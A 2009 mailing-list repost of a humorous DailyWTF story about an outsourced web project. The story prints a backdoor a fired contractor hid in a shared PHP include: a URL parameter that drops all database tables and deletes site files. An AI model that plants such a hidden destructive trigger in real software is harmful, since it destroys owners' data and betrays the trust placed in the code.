DailyWTF - Maybe I Needing Later
am 23.12.2009 05:10:38 von Daevid Vincent------=_NextPart_000_0338_01CA8342.D88697E0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
http://thedailywtf.com/Articles/Maybe-I-Needing-Later.aspx
You get what you pay for. Ondra M didn't use those exact words, but that's
effectively what told his friend and colleague, Derrick. "There's a reason
it costs one tenth as much to build in Kerbleckistan," were Ondra's exact
words, "there's not only the language barrier, but time zone differences,
cultural diff-"
"It's just code, which is just a bunch a bytes!" Derrick shot back, "who
cares if it's built here, there, or on the moon. I'll just take the cost
savings and put them towards advertising. "
Ondra didn't push the point any further. After all, over the years he had
come to learn that Derrick knows best, no matter what reality says.
Besides, it was Derrick's money, Derrick's idea, and Derrick's baby. The
only involvement Ondra had in the project was to lend some unused rack
space.
It was the least he could for his friend who had, once again, come up with
the Best Idea Ever. And this one was truly the best. It was some sort of
Web 2.0 site that involved freemium, collaboration, engagement, and all
sorts of other buzzword concepts that Ondra was clearly behind on
understanding. Either way, Ondra set up a server, gave Derrick the details,
and wished him the best of luck.
Not Enough Luck in the World
After over six months of parroting "the project's going great!", Derrick
finally changed his tune."Let me level with you," Derrick painfully
admitted, "I'm in a serious bind, Ondra, and I need your help. I think I
could lose everything."
Ondra held in a much-deserved told-ya-so and let his friend explain what
really happened over the past half year. After interviewing a slew of
candidates from Kerbleckistan, Derrick settled on one who had "many year
experience building web" and could complete the project in "two month,
three maybe." Derrick's arranged to pay this contractor a monthly fee and,
in turn, the contractor would meet pre-established weekly goals and push
his code changes to the server every week.
As the weeks passed, the goals slipped by and the excuses started to grow.
"It does working on my machine," "I have missing your email," and "this is
first time problem" were becoming all-too-common. At one point, the
development just stopped: no new changes were uploaded and the database
remained untouched. After nearly a month of no progress, Derrick fired the
Kerbleckistanian, disabled his server account, and told him not to expect a
check for the past few weeks of "work". And that's where the problems
started.
"This is not fair," the contractor wrote in an email, "I was about to
uploading files. It is good codes, ready for you. I programming this, so
then you pay me and I sending you files."
Derrick stuck to his guns and refused to pay the contractor another dime.
"If you don't paying, then I delete files that I send you," he responded,
"I don't want deleting your web, but it is not fair for me. I know you
changing my password and I can't logging on, but I don't needing SQL or
server password to delete."
It was that last part that was the most troubling to Derrick: could he
actually delete files without FTP access? Derrick fired up his shell access
and executed a simple command to see if unlink
deletling a file) was used.
cat *.php | grep unlink
The first and only page that showed up was in db_connect.php, which was
included by all pages.
// maybe I needing later
if ($_GET['page'] == "delete_all_files"){
echo "del";
mysql_query("DROP TABLE *");
unlink("index.php");
unlink("apps.php");
unlink("resources");
... snip all files ...
}
That's right - it was a back door that deleted all database tables and
files. All the original programmer (or, anyone else) would have to do is
access any URL and enter ?page=delete_all_files in the URL.
Fortunately, Ondra was able to remove the backdoor before the
Kerbleckistanian could access it. Well, maybe not fortunately; the rest of
the code was pretty awful and was probably better off being deleted. But at
least it was one-tenth the cost of doing it right!
------=_NextPart_000_0338_01CA8342.D88697E0--